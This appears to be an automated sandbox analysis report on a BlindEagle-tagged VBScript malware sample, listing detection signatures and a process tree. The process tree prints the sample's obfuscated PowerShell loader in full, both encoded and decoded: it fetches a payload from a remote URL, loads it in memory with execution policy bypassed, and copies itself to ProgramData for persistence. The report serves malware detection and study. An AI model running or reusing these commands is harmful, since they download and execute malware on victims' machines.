Windows
Analysis Report
WW8kzvnphl.vbs
Overview
General Information
Field | Value
---|---
Sample name | WW8kzvnphl.vbs (renamed because the original name is a hash value)
Original sample name | 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs
Analysis ID | 1523826
MD5 | adadc5d47f87dd519f9a7da9ba03daf5
SHA1 | 3de39ed4ff76305d9dc87b484bf2b78d7f332dbf
SHA256 | 2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd
Tags | BlindEagle, vbs, user-JAMESWT_MHT
Detection
Field | Value
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Command shell drops VBS files
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7412 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7464 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnUjFsJy sndXJsID0g JysnUUxlJy snaHR0cCcr J3M6Ly8nKy dyYScrJ3cn KycuZ2l0aC crJ3UnKydi dXNlcmNvbn RlbnQnKycu Y28nKydtL0 5vRGV0ZWN0 T24vTm9EZX QnKydlJysn YycrJ3RPbi 9yJysnZWZz L2hlYWRzLy crJ20nKydh aW4vRGV0YW hOb3RoLScr J1YudHgnKy d0UUxlOyBS MWxiYXNlNj RDbycrJ24n Kyd0ZW50ID 0gKE5ldy1P YmonKydlY3 QgU3lzdGUn KydtLk5lJy sndCcrJy4n KydXZScrJ2 JDJysnbGkn KydlbnQpLk RvdycrJ25s b2FkJysnU3 RyaW4nKydn JysnKFInKy cxbHVyJysn bCk7JysnIF IxbGJpbicr J2FyeScrJ0 MnKydvbnRl bnQnKycgJy snPSBbU3lz dCcrJ2VtLi crJ0NvbnZl cnRdOjpGci crJ29tQicr J2FzZTY0U3 RyJysnaW4n KydnKFIxbG Jhc2U2NCcr J0NvbnQnKy dlbicrJ3Qp JysnOyBSJy snMWwnKydh c3MnKydlbW InKydseSA9 IFtSZWYnKy dsJysnZWN0 aW9uLkEnKy dzJysnc2Un KydtYmx5XT o6TCcrJ29h ZCgnKydSMW xiaW5hJysn cnlDb250Jy snZW50KTsg JysnWycrJ2 RubGliJysn LklPJysnLk gnKydvbWVd JysnOjonKy dWQUkoZHpr dHh0LicrJ0 dGQ1JSLzAn Kyc1NC8zJy snNS4zNC4n Kyc1LjInKy c3Ly86cHR0 aCcrJ2R6ay crJywgZHpr JysnMWR6ay crJywgJysn ZHprJysnQz prJysnc2gn KydQcm9nci crJ2FtRGF0 YWtzaGR6ay wgZHprYXV0 b3AnKydhdG lhZCcrJ3pr LCcrJyBkem snKydSZWcn KydBc21kei crJ2ssIGQn Kyd6a2QnKy d6aycrJyxk JysnemtkJy snemspJykt UkVQTEFDZS AgKFtjaEFy XTEwMCtbY2 hBcl0xMjIr W2NoQXJdMT A3KSxbY2hB cl0zNCAtUk VQTEFDZSAn a3NoJyxbY2 hBcl05Mi1D UkVwbEFDZS AgKFtjaEFy XTgyK1tjaE FyXTQ5K1tj aEFyXTEwOC ksW2NoQXJd MzYgLVJFUE xBQ2UnUUxl JyxbY2hBcl 0zOSl8ICYo IChbc3RySU 5nXSR2ZXJC T1NlUHJlZk VSRW5jZSlb MSwzXSsneC ctak9Jbicn KQ==';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7472 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7628 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('R1 l'+'url = '+'QLe'+'h ttp'+'s:// '+'ra'+'w' +'.gith'+' u'+'buserc ontent'+'. co'+'m/NoD etectOn/No Det'+'e'+' c'+'tOn/r' +'efs/head s/'+'m'+'a in/DetahNo th-'+'V.tx '+'tQLe; R 1lbase64Co '+'n'+'ten t = (New-O bj'+'ect S yste'+'m.N e'+'t'+'.' +'We'+'bC' +'li'+'ent ).Dow'+'nl oad'+'Stri n'+'g'+'(R '+'1lur'+' l);'+' R1l bin'+'ary' +'C'+'onte nt'+' '+'= [Syst'+'e m.'+'Conve rt]::Fr'+' omB'+'ase6 4Str'+'in' +'g(R1lbas e64'+'Cont '+'en'+'t) '+'; R'+'1 l'+'ass'+' emb'+'ly = [Ref'+'l' +'ection.A '+'s'+'se' +'mbly]::L '+'oad('+' R1lbina'+' ryCont'+'e nt); '+'[' +'dnlib'+' .IO'+'.H'+ 'ome]'+':: '+'VAI(dzk txt.'+'GFC RR/0'+'54/ 3'+'5.34.' +'5.2'+'7/ /:ptth'+'d zk'+', dzk '+'1dzk'+' , '+'dzk'+ 'C:k'+'sh' +'Progr'+' amDatakshd zk, dzkaut op'+'atiad '+'zk,'+' dzk'+'Reg' +'Asmdz'+' k, d'+'zkd '+'zk'+',d '+'zkd'+'z k)')-REPLA Ce ([chAr] 100+[chAr] 122+[chAr] 107),[chAr ]34 -REPLA Ce 'ksh',[ chAr]92-CR EplACe ([c hAr]82+[ch Ar]49+[chA r]108),[ch Ar]36 -REP LACe'QLe', [chAr]39)| &( ([strI Ng]$verBOS ePrefEREnc e)[1,3]+'x '-jOIn'')" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7740 cmdline:
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7972 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 8164 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
System Summary |
---|---
Source: | Author: Florian Roth (Nextron Systems)